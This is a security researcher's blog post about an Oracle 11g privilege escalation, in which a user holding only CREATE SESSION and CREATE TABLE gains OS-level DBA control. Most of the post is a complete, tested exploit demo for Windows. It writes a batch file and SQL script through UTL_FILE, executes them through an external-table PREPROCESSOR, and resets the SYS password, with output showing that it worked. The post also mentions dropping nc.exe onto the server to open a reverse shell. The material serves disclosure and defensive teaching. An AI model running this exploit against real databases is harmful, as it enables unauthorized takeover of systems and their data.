Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed
 

CREATE TABLE to OSDBA

I have written a new paper entitled CREATE TABLE to OSDBA with reverse shell. The paper includes demo code for 11.1.0.7 Windows and UNIX (but not 10g).

The demo shows that granting EXECUTE on a directory in 11g to a user that possesses the common CREATE TABLE privilege is effectively equivalent to granting them OSDBA.

Once an OS based shell script is written via the still PUBLICly executable UTL_FILE and executed by SELECTING the table the .sh can act on any part of the OS owned by Oracle thus bypassing any Oracle directory controls.

I will be discussing how to protect against this as well as the growing number of unpublished 11g “CREATE SESSION to DBA” zero days, in the new SANS DAMS and Oracle 11g security course. Build up your flood defenses in preparation by attending the session below on December 5th
http://www.sans.org/london09/description.php?tid=3602

Here’s the demo for Windows (see paper for UNIX OSDBA reverse shell demo).

--Prepare the low privilege attacker account
SQL> create user ctto identified by ctto;
User created.

SQL> grant create session to ctto;
Grant succeeded.

SQL> grant create table to ctto;
Grant succeeded.

SQL> grant all on directory log_dir to public;
Grant succeeded.

SQL> conn ctto/ctto
Connected.

SQL> select * from user_role_privs;
no rows selected

SQL> select * from user_sys_privs;

USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
CTTO                           CREATE SESSION                           NO
CTTO                           CREATE TABLE                             NO

SQL> select * from user_tab_privs;
no rows selected

--Low priv ctto account looks for a directory left open, which is usually the case. On 10g this would give READ/WRITE 
--but on 11g there is the new EXECUTE privilege thus allowing commands to be executed via the Directory.

SELECT TABLE_NAME FROM ALL_TAB_PRIVS WHERE TABLE_NAME IN
(SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='DIRECTORY')
and privilege='EXECUTE' ORDER BY GRANTEE;
TABLE_NAME
------------------------------
LOG_DIR

SQL> SELECT DIRECTORY_PATH FROM ALL_DIRECTORIES WHERE DIRECTORY_NAME='LOG_DIR';
DIRECTORY_PATH
--------------------------------------------------------------------------
C:\SCRIPTS
Windows CREATE TABLE to SYSDBA and OSDBA 
--Write a batch file to the OS that will call the second .sql (using PUBLIC UTL_FILE execute)
declare
    f utl_file.file_type;
    s varchar2(200) := 'sqlplus -S -L / as sysdba @c:\scripts\changepassword.sql';
begin
    f := utl_file.fopen('LOG_DIR','changesyspw.bat','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/
--write the changepassword.sql that will be called by the batch file.
declare
    f utl_file.file_type;
    s varchar2(200) := 'alter user sys identified by newpassword;';
begin
    f := utl_file.fopen('LOG_DIR','changepassword.sql','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/
--Execute shell script via  external table http://structureddata.org/2008/11/19/preprocessor-for-external-tables/
CREATE TABLE execute_mybinary( "testrow" VARCHAR2(60))
ORGANIZATION EXTERNAL(
  TYPE oracle_loader  DEFAULT DIRECTORY LOG_DIR
  ACCESS PARAMETERS  (
     RECORDS DELIMITED BY NEWLINE
     PREPROCESSOR LOG_DIR:'changesyspw.bat' OPTIONS '-R'
     BADFILE LOG_DIR:'execute_mybinary.bad'
     LOGFILE LOG_DIR:'execute_mybinary.log'
     FIELDS TERMINATED BY '|'
     MISSING FIELD VALUES ARE NULL  (
        "testrow"     )  )
  LOCATION ('changesyspw.bat'))
REJECT LIMIT UNLIMITED;

--from another sys session
SQL> select password from sys.user$ where name='SYS';
PASSWORD
------------------------------
5638228DAF52805F

--as ctto low privilege user executes the .bat via the SELECT statement
select count(*) from execute_mybinary;

--You will receive an KUP-04095 error but the script will change the SYS password,
SQL> select password from sys.user$ where name='SYS';
PASSWORD
------------------------------
66A86F065449C773

--Tested and working on 11.1.0.7 
SQL> select * from v$version;
BANNER
--------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
PL/SQL Release 11.1.0.7.0 - Production
CORE    11.1.0.7.0      Production
TNS for 32-bit Windows: Version 11.1.0.7.0 - Production
NLSRTL Version 11.1.0.7.0 – Production

Also low priv attacker can write nc.exe binary to the OS using UTL_FILE binary mode as per method outlined in http://www.oracleforensics.com/wordpress/index.php/2008/10/10/create-any-directory-to-sysdba/

Given that there will always be new unexpected attacks it is essential to monitor DB user activity via a DAMS so that suspicious activity can be alerted to. http://www.sans.org/london09/description.php?tid=3602

Cheers,
Paul

Comments are closed.